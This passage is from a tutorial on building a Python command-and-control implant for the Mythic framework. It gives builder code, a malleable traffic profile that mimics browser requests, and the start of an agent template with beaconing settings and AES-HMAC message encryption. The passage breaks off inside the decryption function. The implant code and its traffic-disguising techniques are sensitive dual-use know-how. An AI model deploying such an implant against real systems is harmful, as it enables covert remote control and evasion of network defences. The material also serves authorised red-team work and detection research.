
Building a Mythic C2 Agent in Python — Part 2: Batched Tasking, HTTPS, and the httpx Profile

Overview

Part 1 left us with a working but operationally naive agent. Three things need fixing before we can consider it even minimally production-ready:

  1. One task per beacon. The agent sends tasking_size: 1 and sleeps between every single task, even if Mythic has ten tasks queued. The Mythic docs explicitly describe a way to request all pending tasks and fold responses into the next tasking request to halve round trips.
  2. Plaintext traffic. HTTP with no encryption is only acceptable for debugging. We need TLS and Mythic-managed AES-256 PSK encryption.
  3. No request shaping. The http profile is fixed — the message always goes in the body of a POST. The httpx profile lets you put the agent message anywhere in the request and customise every header, making the traffic blend into legitimate-looking web activity.

This part addresses all three. We'll also properly explain what a C2 profile actually is before introducing the new one.
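To make the first item concrete, here is a minimal sketch of a batched tasking request. It assumes the message keys described in the Mythic docs (action, tasking_size, responses) and that a tasking_size of -1 asks for every queued task; check both against your Mythic version. build_tasking_request and the sample response are hypothetical names used only for illustration.

```python
import json

def build_tasking_request(pending_responses, tasking_size=-1):
    """Build one get_tasking message that also carries queued task responses.

    Assumption: tasking_size=-1 means "send me everything that is queued".
    """
    message = {"action": "get_tasking", "tasking_size": tasking_size}
    if pending_responses:
        # Copy the list so the caller can clear its queue after a successful send.
        message["responses"] = list(pending_responses)
    return message

# Hypothetical finished task waiting to be reported on the next beacon.
queued = [{"task_id": "hypothetical-task-uuid", "user_output": "done", "completed": True}]
print(json.dumps(build_tasking_request(queued)))
```

Folding the responses into the tasking request means one round trip per beacon instead of a get_tasking followed by a separate post_response.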


1. What is a C2 Profile?

Before switching profiles it is worth understanding what they actually are. Per the Mythic C2 development docs:

C2 profiles live in their own docker containers and act as a translation mechanism between whatever your special sauce C2 protocol is and what the back-end Mythic server understands (HTTP + JSON). Their entire role in life is to get data off the wire from whatever special communications format you're using and forward that to Mythic.

And from the C2 profiles operational docs:

There are two main pieces for every C2 profile: Server code — code that runs in a docker container to convert the C2 profile communication specification into the corresponding RESTful endpoints that Mythic uses. Agent code — the code that runs in a callback to implement the C2 profile on the target machine.

A C2 profile is a separate Docker container. Your agent talks to the C2 profile container; the profile container talks to Mythic. The agent never communicates with Mythic directly:

Agent  ──HTTP/S──▶  C2 Profile Container  ──RabbitMQ──▶  Mythic Backend
       ◀──────────                         ◀────────────

http vs httpx

http is "simple HTTP async comms using standard GET/POST requests." The message is always in the POST body. There is no configuration of where the message lives or how it is transformed.

httpx is "a more dynamic and configurable HTTP profile." Per the README it supports:

  • Message location in cookies, headers, query parameters, or body
  • Message transforms: base64, base64url, XOR, NetBIOS, prepend, append
  • Custom client/server headers
  • Multiple callback domains with rotation

The configuration is provided via a JSON file uploaded at build time. This file is a contract between two parties:

  1. The httpx server container reads it to know how to parse incoming requests and format outgoing responses
  2. The agent must independently implement the same contract — applying the same transforms, using the same URI, placing the message in the specified location

The agent does not read the file at runtime. The relevant values (URI, message location, transforms) are extracted from the file by builder.py at build time and stamped into the agent as constants.
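The contract idea can be sketched in a few lines: one side applies the transforms in listed order, the other undoes them last-first. This is an illustration only, covering two actions with a hypothetical transform list; it is not the httpx container's code.

```python
import base64

# Hypothetical transform list, in the same shape as a profile "transforms" array.
TRANSFORMS = [
    {"action": "base64url", "value": ""},
    {"action": "prepend", "value": "id="},
]

def encode(data: bytes, transforms: list) -> bytes:
    """Sender side: apply each transform in listed order."""
    for t in transforms:
        if t["action"] == "base64url":
            data = base64.urlsafe_b64encode(data)
        elif t["action"] == "prepend":
            data = t["value"].encode() + data
    return data

def decode(data: bytes, transforms: list) -> bytes:
    """Receiver side: undo the same transforms, last one first."""
    for t in reversed(transforms):
        if t["action"] == "prepend":
            data = data[len(t["value"].encode()):]
        elif t["action"] == "base64url":
            data = base64.urlsafe_b64decode(data)
    return data

wire = encode(b"agent message", TRANSFORMS)
assert decode(wire, TRANSFORMS) == b"agent message"
```

If either side used a different list, or the same list in a different order, the round trip would fail, which is why the values have to be stamped into the agent from the same file the server reads.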


2. The Malleable Profile Config File

The profile config schema is shown in Xenon's example profiles. The top-level structure is:

{
  "name": "Profile Name",
  "get": {
    "verb": "GET",
    "uris": ["/uri1", "/uri2"],
    "client": {
      "headers": { "User-Agent": "..." },
      "parameters": null,
      "message": {
        "location": "query",
        "name": "filter"
      },
      "transforms": [
        { "action": "base64url", "value": "" }
      ]
    },
    "server": {
      "headers": { "Content-Type": "application/json" },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  },
  "post": {
    "verb": "POST",
    "uris": ["/upload"],
    "client": {
      "headers": { "Content-Type": "application/json" },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  }
}

Key fields:

  • name — required. The httpx container uses this to identify the profile variation. Omitting it produces Missing name for agent variation.
  • message.location — where the agent places the message: "body", "query", "header", or "cookie".
  • message.name — the query parameter, header, or cookie name when location is not "body".
  • client.transforms — transforms applied to the message before sending, in order.
  • server.transforms — transforms the agent applies in reverse to decode the server's response.
  • uris — array of URI paths. The agent selects from these per request.
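As a rough sketch of how message.location and message.name drive the request, the helper below returns the URL, headers, and body for each placement without doing any network I/O. place_message is a hypothetical name, and the exact cookie and header formatting the httpx container expects is an assumption here.

```python
def place_message(encoded: str, location: str, name: str, uri: str) -> dict:
    """Return the request pieces for one message placement (no network I/O)."""
    parts = {"url": uri, "headers": {}, "body": b""}
    if location == "body":
        parts["body"] = encoded.encode()
    elif location == "query":
        # Assumes the encoded value is already URL-safe (e.g. base64url).
        parts["url"] = f"{uri}?{name}={encoded}"
    elif location == "header":
        parts["headers"][name] = encoded
    elif location == "cookie":
        parts["headers"]["Cookie"] = f"{name}={encoded}"
    else:
        raise ValueError(f"unknown message location: {location!r}")
    return parts

print(place_message("QUJD", "query", "filter", "/uri1")["url"])   # /uri1?filter=QUJD
```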

Available transform actions per the httpx README: base64, base64url, xor, prepend, append, netbios, netbiosu.

The Profile for Part 2

Save this as pyrite_httpx.json before generating a payload. This uses the simplest possible transform (body + base64) to keep the agent straightforward while still correctly implementing the full pipeline:

{
  "name": "Pyrite",
  "get": {
    "verb": "GET",
    "uris": ["/"],
    "client": {
      "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
      },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  },
  "post": {
    "verb": "POST",
    "uris": ["/data"],
    "client": {
      "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/octet-stream"
      },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  }
}
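Before uploading the file, a quick local sanity check can catch the most common mistakes (a missing name, an empty uris array, a non-body location with no message.name). The checker below is a sketch based only on the fields described above; validate_profile is a hypothetical helper, and the httpx container may enforce additional rules.

```python
VALID_LOCATIONS = {"body", "query", "header", "cookie"}

def validate_profile(config: dict) -> list:
    """Return a list of human-readable problems; an empty list means the checks passed."""
    problems = []
    if not config.get("name"):
        problems.append("missing top-level 'name'")
    for block_name in ("get", "post"):
        block = config.get(block_name)
        if not isinstance(block, dict):
            problems.append(f"missing '{block_name}' block")
            continue
        if not block.get("uris"):
            problems.append(f"{block_name}: 'uris' is empty")
        message = (block.get("client") or {}).get("message") or {}
        location = message.get("location")
        if location not in VALID_LOCATIONS:
            problems.append(f"{block_name}: bad message.location {location!r}")
        elif location != "body" and not message.get("name"):
            problems.append(f"{block_name}: message.name is required for {location}")
    return problems

# Trimmed-down version of the Part 2 profile, just enough for the checks.
sample = {
    "name": "Pyrite",
    "get":  {"uris": ["/"],     "client": {"message": {"location": "body", "name": ""}}},
    "post": {"uris": ["/data"], "client": {"message": {"location": "body", "name": ""}}},
}
print(validate_profile(sample))   # []
```

To check the real file, load it with json.load(open("pyrite_httpx.json")) and pass the result to validate_profile.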

3. Install httpx and pycryptodome

sudo ./mythic-cli install github https://github.com/MythicC2Profiles/httpx

Also update pyrite/Dockerfile to install pycryptodome — the agent uses it for AES-256-CBC encryption:

FROM itsafeaturemythic/mythic_python_base:latest

WORKDIR /Mythic/

RUN pip install requests pycryptodome

CMD ["python3", "main.py"]

pycryptodome must also be available on the target machine where the agent runs. If the target is a controlled lab host, install it with pip install pycryptodome. For targets where you cannot guarantee it is available, use AESPSK = none (plaintext mode). A production agent would bundle the AES implementation — Part 3 addresses this when we implement a custom protocol.


4. builder.py — Full Updated Version

File: pyrite/mythic/agent_functions/builder.py. This file runs inside the Mythic container. It must contain only the Pyrite(PayloadType) class. It must not contain any bare (unquoted) REPLACE_* tokens; those belong exclusively in pyrite/agent_code/pyrite_agent.py. The quoted REPLACE_* strings used as keys in the replacements dict are fine, because they are ordinary string literals. A bare token such as REPLACE_CALLBACK_PORT is a syntactically valid but undefined name, so Python raises a NameError when that line executes (at import time if it sits at module or class level).

The mythic/agent_functions/ layout follows the Medusa convention established in Part 1. All server-side container code lives under pyrite/mythic/; implant code lives under pyrite/agent_code/.

# pyrite/mythic/agent_functions/builder.py
import logging
import pathlib
import json

from mythic_container.PayloadBuilder import *
from mythic_container.MythicCommandBase import *
from mythic_container.MythicRPC import *


class Pyrite(PayloadType):
    name = "pyrite"
    file_extension = "py"
    author = "@yourhandle"
    supported_os = [SupportedOS.Linux, SupportedOS.Windows, SupportedOS.MacOS]
    wrapper = False
    wrapped_payloads = []
    note = "Simple Python3 agent for demonstrating Mythic agent development."
    supports_dynamic_loading = True
    mythic_encrypts = True
    translation_container = None

    c2_profiles = ["httpx"]     # Part 2: httpx only

    build_parameters = [
        BuildParameter(
            name="version",
            parameter_type=BuildParameterType.String,
            description="Agent version string",
            default_value="0.1.0",
            required=False,
        ),
    ]

    agent_path      = pathlib.Path(".") / "pyrite"
    agent_icon_path = agent_path / "mythic" / "agent_functions" / "pyrite.svg"
    agent_code_path = agent_path / "agent_code"

    build_steps = [
        BuildStep(
            step_name="Gathering Files",
            step_description="Reading agent template and command files from disk",
        ),
        BuildStep(
            step_name="Configuring",
            step_description="Stamping C2 parameters into the agent source",
        ),
    ]

    async def build(self) -> BuildResponse:
        resp = BuildResponse(status=BuildStatus.Success)

        # ── Step 1: Read template and command files ────────────────────────
        try:
            # read_text() opens, reads, and closes the file in one call
            agent_source = (self.agent_code_path / "pyrite_agent.py").read_text()

            command_code = ""
            for cmd in self.commands.get_commands():
                try:
                    command_code += (self.agent_code_path / f"{cmd}.py").read_text() + "\n"
                except FileNotFoundError:
                    # Commands without an agent-side source file are skipped
                    pass

            agent_source = agent_source.replace(
                "# ##COMMAND_CODE_INSERT##",
                command_code
            )

            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Gathering Files",
                    StepStdout="Read agent template and command files successfully",
                    StepSuccess=True,
                )
            )
        except Exception as e:
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Gathering Files",
                    StepStdout=str(e),
                    StepSuccess=False,
                )
            )
            resp.set_status(BuildStatus.Error)
            resp.build_stderr = f"Failed to read agent template: {e}"
            return resp

        # ── Step 2: Extract parameters and stamp into agent ────────────────
        try:
            if len(self.c2info) != 1:
                raise ValueError(f"Expected 1 C2 profile, got {len(self.c2info)}")

            params = self.c2info[0].get_parameters_dict()

            # ── AESPSK ─────────────────────────────────────────────────────
            # AESPSK is a C2 profile parameter with crypto_type=True.
            # When operator selects "aes256_hmac", Mythic auto-generates a
            # 32-byte per-payload AES key and returns it as a dict.
            # When "none" is selected, no key is generated.
            # Per the Mythic checkin docs, Mythic looks up this key by
            # PayloadUUID to know how to decrypt incoming agent messages.
            aespsk_raw = params.get("AESPSK")
            if isinstance(aespsk_raw, dict):
                aespsk = aespsk_raw.get("enc_key") or ""
            elif aespsk_raw:
                aespsk = str(aespsk_raw)
            else:
                aespsk = ""

            # ── encrypted_exchange_check ────────────────────────────────────
            # Boolean C2 profile parameter defined by httpx. Controls whether
            # the agent performs RSA EKE (staging_rsa exchange) before checkin.
            # True + AESPSK set  → EKE: use AESPSK only for staging exchange,
            #                      then use negotiated session key for all traffic
            # False + AESPSK set → Static PSK: use AESPSK for all traffic directly
            # False + no AESPSK  → Plaintext: no encryption
            eke_raw = params.get("encrypted_exchange_check", False)
            if isinstance(eke_raw, str):
                eke_enabled = eke_raw.lower() in ("true", "t", "1", "yes")
            else:
                eke_enabled = bool(eke_raw)
            use_eke = eke_enabled and bool(aespsk)

            # ── Callback domains ───────────────────────────────────────────
            # httpx uses callback_domains (array of full URLs).
            # Mythic may return it as a Python list or as a JSON array string.
            callback_domains = params.get("callback_domains", ["http://127.0.0.1:80"])
            if isinstance(callback_domains, str):
                # Try to parse as JSON array e.g. '["http://127.0.0.1:82"]'
                try:
                    callback_domains = json.loads(callback_domains)
                except Exception:
                    callback_domains = [callback_domains]
            if isinstance(callback_domains, list) and callback_domains:
                first_domain = str(callback_domains[0]).strip()
            else:
                first_domain = str(callback_domains).strip()

            # Parse scheme://host:port
            # e.g. "http://127.0.0.1:82" → host="http://127.0.0.1", port="82"
            import re
            domain_match = re.match(r'^(https?://[^:/]+):(\d+)/?$', first_domain)
            if domain_match:
                callback_host = domain_match.group(1)
                callback_port = domain_match.group(2)
            else:
                # No explicit port — use scheme default
                callback_host = first_domain.rstrip("/")
                callback_port = "443" if first_domain.startswith("https") else "80"

            # ── Parse the uploaded malleable profile config file ────────────
            # The correct parameter key is "raw_c2_config".
            # It contains the JSON/TOML profile config file contents as a string.
            profile_config = {}
            raw_config = params.get("raw_c2_config")
            if raw_config:
                if isinstance(raw_config, str) and len(raw_config) == 36:
                    # It's a file UUID — fetch contents via MythicRPC
                    file_resp = await SendMythicRPCFileGetContent(
                        MythicRPCFileGetContentMessage(AgentFileId=raw_config)
                    )
                    if file_resp.Success:
                        profile_config = json.loads(file_resp.Content)
                elif isinstance(raw_config, str):
                    profile_config = json.loads(raw_config)
                elif isinstance(raw_config, dict):
                    profile_config = raw_config

            # ── Extract values from the profile config ──────────────────────
            # POST block — used for checkin and post_response
            post_block        = profile_config.get("post", {})
            post_client       = post_block.get("client", {})
            post_msg          = post_client.get("message", {})
            post_server       = post_block.get("server", {})

            post_uris         = post_block.get("uris", ["/data"])
            post_uris_json    = json.dumps(post_uris)
            post_uri          = post_uris[0] if post_uris else "/data"  # kept for fallback
            post_msg_loc      = post_msg.get("location", "body")
            post_msg_name     = post_msg.get("name", "")
            post_transforms   = json.dumps(post_client.get("transforms", []))
            post_srv_xforms   = json.dumps(post_server.get("transforms", []))
            post_headers      = json.dumps(post_client.get("headers", {}))

            # GET block — used for get_tasking
            get_block         = profile_config.get("get", {})
            get_client        = get_block.get("client", {})
            get_msg           = get_client.get("message", {})
            get_server        = get_block.get("server", {})

            get_uris          = get_block.get("uris", ["/"])
            get_uris_json     = json.dumps(get_uris)
            get_uri           = get_uris[0] if get_uris else "/"  # kept for fallback
            get_msg_loc       = get_msg.get("location", "body")
            get_msg_name      = get_msg.get("name", "")
            get_transforms    = json.dumps(get_client.get("transforms", []))
            get_srv_xforms    = json.dumps(get_server.get("transforms", []))
            get_headers       = json.dumps(get_client.get("headers", {}))

            # ── Build replacements dict ─────────────────────────────────────
            # Every value must be a str — params.get() can return None for
            # optional fields and str.replace() will raise if given None.
            def s(val, default=""):
                return str(val) if val is not None else default

            replacements = {
                "REPLACE_CALLBACK_HOST":          callback_host,
                "REPLACE_CALLBACK_PORT":          callback_port,
                "REPLACE_CALLBACK_INTERVAL":      s(params.get("callback_interval"), "10"),
                "REPLACE_CALLBACK_JITTER":        s(params.get("callback_jitter"), "23"),
                "REPLACE_PAYLOAD_UUID":           str(self.uuid),
                "REPLACE_AESPSK":                 aespsk,
                "REPLACE_KILL_DATE":              s(params.get("killdate"), ""),
                "REPLACE_USE_EKE":                str(use_eke),
                # POST profile values
                "REPLACE_POST_URIS":              post_uris_json,   # list literal
                "REPLACE_POST_URI":               post_uri,
                "REPLACE_POST_MSG_LOC":           post_msg_loc,
                "REPLACE_POST_MSG_NAME":          post_msg_name,
                "REPLACE_POST_TRANSFORMS":        post_transforms,
                "REPLACE_POST_SERVER_TRANSFORMS": post_srv_xforms,
                "REPLACE_POST_HEADERS":           post_headers,
                # GET profile values
                "REPLACE_GET_URIS":               get_uris_json,    # list literal
                "REPLACE_GET_URI":                get_uri,
                "REPLACE_GET_MSG_LOC":            get_msg_loc,
                "REPLACE_GET_MSG_NAME":           get_msg_name,
                "REPLACE_GET_TRANSFORMS":         get_transforms,
                "REPLACE_GET_SERVER_TRANSFORMS":  get_srv_xforms,
                "REPLACE_GET_HEADERS":            get_headers,
            }

            for token, value in replacements.items():
                agent_source = agent_source.replace(token, value)

            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Configuring",
                    StepStdout="Stamped all C2 parameters into agent source",
                    StepSuccess=True,
                )
            )
            resp.payload = agent_source.encode()
            resp.build_message = "Pyrite built successfully."

        except Exception as e:
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Configuring",
                    StepStdout=str(e),
                    StepSuccess=False,
                )
            )
            resp.set_status(BuildStatus.Error)
            resp.build_stderr = f"Configuration failed: {e}"

        return resp
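One subtlety in the replacement loop is worth a sketch: REPLACE_POST_URI is a prefix of REPLACE_POST_URIS, so the result depends on which token is replaced first. The builder's dict happens to list the longer token first. The hypothetical stamp helper below removes that dependency by replacing longer tokens before shorter ones; the template text and values are made up for the demo.

```python
import json

# Made-up three-line template using the same token conventions as the agent.
TEMPLATE = '''POST_URIS = REPLACE_POST_URIS
POST_URI = "REPLACE_POST_URI"
USE_EKE = REPLACE_USE_EKE
'''

replacements = {
    "REPLACE_POST_URI": "/data",                       # shorter token listed first on purpose
    "REPLACE_POST_URIS": json.dumps(["/data", "/up"]),
    "REPLACE_USE_EKE": str(False),
}

def stamp(source: str, values: dict) -> str:
    """Replace longer tokens first so a token never clobbers one it is a prefix of."""
    for token in sorted(values, key=len, reverse=True):
        source = source.replace(token, values[token])
    return source

stamped = stamp(TEMPLATE, replacements)
namespace = {}
exec(stamped, namespace)   # the stamped text must be valid Python
assert namespace["POST_URIS"] == ["/data", "/up"]
assert namespace["POST_URI"] == "/data"
assert namespace["USE_EKE"] is False
```

With a plain loop over this dict in insertion order, the first line would become POST_URIS = /dataS, which is a syntax error in the generated agent.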

5. Understanding mythic_encrypts, AESPSK, and encrypted_exchange_check

mythic_encrypts

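mythic_encrypts = True in builder.py is a developer declaration: it tells Mythic to handle encryption and decryption of agent messages itself on the server side, rather than delegating that work to a translation container. The agent therefore has to implement Mythic's AES-256-CBC + HMAC-SHA256 format on its own end. The C2 profile container is a transparent forwarder: the agent encrypts, Mythic's backend decrypts.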

AESPSK — the encryption key parameter

AESPSK is a C2 profile parameter with crypto_type=True. Per the Mythic checkin docs:

When creating payloads, you can generate encryption keys per C2 profile. To do so, the C2 Profile will have a parameter that has an attribute called crypto_type=True. This will then signal to Mythic to either generate a new per-payload AES256_HMAC key... In the http profile for example, this is a ChooseOne option between aes256_hmac or none.

When aes256_hmac is selected, Mythic auto-generates a 32-byte per-payload AES key and returns it in params["AESPSK"] as {"enc_key":"...","dec_key":"...","value":"aes256_hmac"}. The builder stamps this key into the agent as AESPSK. Mythic also stores it server-side and uses the outer UUID to look it up when decrypting inbound messages.

When none is selected, no key is generated and AESPSK is empty.

encrypted_exchange_check — EKE toggle

encrypted_exchange_check is a boolean parameter defined by the C2 profile — both http and httpx include it. It is not a Mythic core concept (the Mythic docs do not mention it by name), but it is a de facto convention across multiple profiles. It controls whether the agent performs RSA EKE before the static-PSK checkin.

The combination matrix:

AESPSK      | encrypted_exchange_check | What the agent does
------------|--------------------------|--------------------
none        | either                   | Plaintext checkin: no key exists, so EKE is impossible regardless of this flag
aes256_hmac | false                    | Static PSK: use the stamped-in AESPSK to encrypt all traffic directly, no EKE staging
aes256_hmac | true                     | EKE: use AESPSK only for the staging_rsa exchange to negotiate a per-session key, then use that session key for all subsequent traffic

The key difference between static PSK and EKE: with static PSK, the embedded key is used for every callback from that payload — anyone who extracts the binary can decrypt all traffic. With EKE, the embedded key only protects the staging exchange; session traffic uses a unique key negotiated at runtime that never touches disk.
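The three rows of the matrix collapse into a small decision function. This is a sketch: select_crypto_mode and its return labels are hypothetical, and the string handling mirrors the tolerant boolean parsing used in builder.py.

```python
def select_crypto_mode(aespsk: str, encrypted_exchange_check) -> str:
    """Map the two build parameters onto the three rows of the matrix."""
    if isinstance(encrypted_exchange_check, str):
        eke_flag = encrypted_exchange_check.lower() in ("true", "t", "1", "yes")
    else:
        eke_flag = bool(encrypted_exchange_check)

    if not aespsk:
        # No key was generated, so EKE cannot run whatever the flag says.
        return "plaintext"
    return "eke" if eke_flag else "static_psk"

print(select_crypto_mode("", True))              # plaintext
print(select_crypto_mode("c29tZWtleQ==", "T"))   # eke
```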

The builder computes USE_EKE = encrypted_exchange_check AND AESPSK_is_set and stamps it into the agent as REPLACE_USE_EKE. do_checkin branches on USE_EKE.

Wire format

Regardless of which path is taken, the message format follows the Mythic spec. With encryption active:

Base64( UUID(36) + IV(16) + AES-CBC(JSON body) + HMAC-SHA256(IV + ciphertext) )

Without encryption:

Base64( UUID(36) + JSON body )
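The framing can be sketched with the standard library alone. The helpers below build the plaintext form and split either form back into its fields using the offsets from the two layouts above; they do no AES or HMAC work, and frame_plaintext and split_message are hypothetical names.

```python
import base64
import json

UUID_LEN, IV_LEN, MAC_LEN = 36, 16, 32

def frame_plaintext(agent_uuid: str, body: dict) -> bytes:
    """Base64( UUID(36) + JSON body )"""
    if len(agent_uuid) != UUID_LEN:
        raise ValueError("UUID must be the 36-character string form")
    return base64.b64encode(agent_uuid.encode() + json.dumps(body).encode())

def split_message(wire: bytes, encrypted: bool):
    """Undo the outer Base64 and separate the UUID from the rest of the message."""
    raw = base64.b64decode(wire)
    agent_uuid, rest = raw[:UUID_LEN].decode(), raw[UUID_LEN:]
    if not encrypted:
        return agent_uuid, json.loads(rest)
    # Encrypted layout: IV(16) + ciphertext + HMAC-SHA256(32)
    iv, ciphertext, mac = rest[:IV_LEN], rest[IV_LEN:-MAC_LEN], rest[-MAC_LEN:]
    return agent_uuid, (iv, ciphertext, mac)

demo_uuid = "00000000-0000-0000-0000-000000000000"   # placeholder UUID
wire = frame_plaintext(demo_uuid, {"action": "checkin"})
assert split_message(wire, encrypted=False) == (demo_uuid, {"action": "checkin"})
```

The UUID always sits outside the encrypted portion, which is what lets Mythic look up the right key before it attempts decryption.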

6. The Full Agent Template — pyrite_agent.py

File: pyrite/agent_code/pyrite_agent.py This file is the implant template. It is read as a text file by builder.py at build time — it is never imported by Python directly. The REPLACE_* tokens are plain text substitution markers, not Python variables. Do not put this code in mythic/agent_functions/builder.py.
Replace the file entirely. The agent from Part 1 has no AES implementation — it will stamp in the AESPSK key but never use it, sending plaintext regardless of what the operator selects. Delete the old file and replace it with the version below.

Also update the stale comment in builder.py Step 2 — replace the old comment block for AESPSK with:

# ── AESPSK ─────────────────────────────────────────────────────
# The agent uses this key to encrypt every message body.
# "aes256_hmac" → Mythic returns {"enc_key": "...", "dec_key": "...", "value": "aes256_hmac"}
# "none"        → stamp empty string, agent sends plaintext

This is the complete rewrite of the agent for httpx. All profile values are stamped in as constants at build time. The agent implements the full transform pipeline and AES-256-CBC + HMAC-SHA256 encryption.

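Note the token format for list and dict values: they are written without quotes in the template because the builder substitutes them with the output of json.dumps(). For the lists and dicts of strings used here, that JSON text is also a valid Python literal (JSON null, true, and false would not be):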

# In template — no quotes:
GET_TRANSFORMS = REPLACE_GET_TRANSFORMS

# After builder substitution — valid Python literal:
GET_TRANSFORMS = [{"action": "base64", "value": ""}]

#!/usr/bin/env python3
"""
pyrite_agent.py — Pyrite implant for Mythic C2 (Part 2: httpx)

THIS IS A TEMPLATE. All REPLACE_* tokens are substituted at build time
by builder.py. Do not replace them with real values here.
"""

import base64
import datetime
import json
import os
import platform
import random
import socket
import subprocess
import sys
import time
import traceback

try:
    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
    import urllib.request
    import urllib.error
    requests = None

# ── Configuration stamped in by builder.py ────────────────────────────────────
CALLBACK_HOST     = "REPLACE_CALLBACK_HOST"
CALLBACK_PORT     = REPLACE_CALLBACK_PORT
CALLBACK_INTERVAL = REPLACE_CALLBACK_INTERVAL
CALLBACK_JITTER   = REPLACE_CALLBACK_JITTER
PAYLOAD_UUID      = "REPLACE_PAYLOAD_UUID"
AESPSK            = "REPLACE_AESPSK"
KILL_DATE_STR     = "REPLACE_KILL_DATE"
USE_EKE           = REPLACE_USE_EKE      # True if encrypted_exchange_check=true AND AESPSK set

# ── Profile-derived values stamped in by builder.py ───────────────────────────
# These come from the uploaded malleable profile config file.
# List and dict tokens are substituted WITHOUT quotes — they become
# Python literal values directly (e.g. [{"action": "base64", "value": ""}]).

POST_URIS                = REPLACE_POST_URIS
POST_URI                 = "REPLACE_POST_URI"
POST_MSG_LOC             = "REPLACE_POST_MSG_LOC"
POST_MSG_NAME            = "REPLACE_POST_MSG_NAME"
POST_TRANSFORMS          = REPLACE_POST_TRANSFORMS
POST_SERVER_TRANSFORMS   = REPLACE_POST_SERVER_TRANSFORMS
POST_HDRS                = REPLACE_POST_HEADERS

GET_URIS                 = REPLACE_GET_URIS
GET_URI                  = "REPLACE_GET_URI"
GET_MSG_LOC              = "REPLACE_GET_MSG_LOC"
GET_MSG_NAME             = "REPLACE_GET_MSG_NAME"
GET_TRANSFORMS           = REPLACE_GET_TRANSFORMS
GET_SERVER_TRANSFORMS    = REPLACE_GET_SERVER_TRANSFORMS
GET_HDRS                 = REPLACE_GET_HEADERS

# ── Globals ────────────────────────────────────────────────────────────────────
CALLBACK_UUID      = None
SESSION_KEY        = None   # negotiated AES key after EKE staging — replaces AESPSK
BASE_URL           = f"{CALLBACK_HOST}:{CALLBACK_PORT}"
_pending_responses = []


# ─────────────────────────────────────────────────────────────────────────────
# AES-256-CBC + HMAC-SHA256 Encryption
# ─────────────────────────────────────────────────────────────────────────────
# Per the Mythic agent message format docs:
#   https://docs.mythic-c2.net/customizing/payload-type-development/
#           create_tasking/agent-side-coding/initial-checkin
#
# Wire format when AESPSK is set:
#   Base64( UUID(36) + IV(16) + AES-CBC(JSON) + HMAC-SHA256(IV + ciphertext) )
#
# AES details (from docs):
#   Mode:    CBC
#   Padding: PKCS7, block size 16
#   IV:      16 random bytes, fresh per message
#   HMAC:    SHA256 over (IV + ciphertext) using the same AES key, appended after ciphertext
#
# Uses pycryptodome if available, falls back to pyca/cryptography.
# Add to Dockerfile: RUN pip install pycryptodome

import hashlib
import hmac as _hmac_mod

try:
    from Crypto.Cipher import AES as _AES
    from Crypto.Util.Padding import pad as _pad, unpad as _unpad
    _CRYPTO_LIB = "pycryptodome"
except ImportError:
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher as _Cipher
        from cryptography.hazmat.primitives.ciphers.algorithms import AES as _AESAlgo
        from cryptography.hazmat.primitives.ciphers.modes import CBC as _CBC
        from cryptography.hazmat.primitives import padding as _padding
        _CRYPTO_LIB = "cryptography"
    except ImportError:
        _CRYPTO_LIB = None


def mythic_encrypt(plaintext_json: bytes, aes_key_b64: str) -> bytes:
    """
    Encrypt a JSON body per the Mythic static-encryption spec.
    Returns: IV(16) + AES-CBC(padded plaintext) + HMAC-SHA256(IV + ciphertext)
    The UUID prefix is NOT included here — it is prepended in send_message.
    """
    key = base64.b64decode(aes_key_b64)
    iv  = os.urandom(16)

    if _CRYPTO_LIB == "pycryptodome":
        cipher     = _AES.new(key, _AES.MODE_CBC, iv)
        padded     = _pad(plaintext_json, 16)
        ciphertext = cipher.encrypt(padded)
    elif _CRYPTO_LIB == "cryptography":
        padder     = _padding.PKCS7(128).padder()
        padded     = padder.update(plaintext_json) + padder.finalize()
        cipher     = _Cipher(_AESAlgo(key), _CBC(iv))
        encryptor  = cipher.encryptor()
        ciphertext = encryptor.update(padded) + encryptor.finalize()
    else:
        raise RuntimeError("No AES library available. Install pycryptodome.")

    mac = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
    return iv + ciphertext + mac


def mythic_decrypt(data: bytes, aes_key_b64: str) -> bytes:
    """
    Decrypt a Mythic-format encrypted blob.
    data = IV(16) + ciphertext + HMAC-SHA256(32)
    Verifies HMAC before decrypting. Returns plaintext JSON bytes.
    """
    key        = base64.b64decode(aes_key_b64)
    iv         = data[:16]
    mac        = data[-32:]
    ciphertext = data[16:-32]

    expected = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
    if not _hmac_mod.compare_digest(mac, expected):
        raise ValueError("HMAC verification failed — message may be tampered or key is wrong")

    if _CRYPTO_LIB == "pycryptodome":
        cipher = _AES.new(key, _AES.MODE_CBC, iv)
        padded = cipher.decrypt(ciphertext)
        return _unpad(padded, 16)
    elif _CRYPTO_LIB == "cryptography":
        cipher    = _Cipher(_AESAlgo(key), _CBC(iv))
        decryptor = cipher.decryptor()
        padded    = decryptor.update(ciphertext) + decryptor.finalize()
        unpadder  = _padding.PKCS7(128).unpadder()
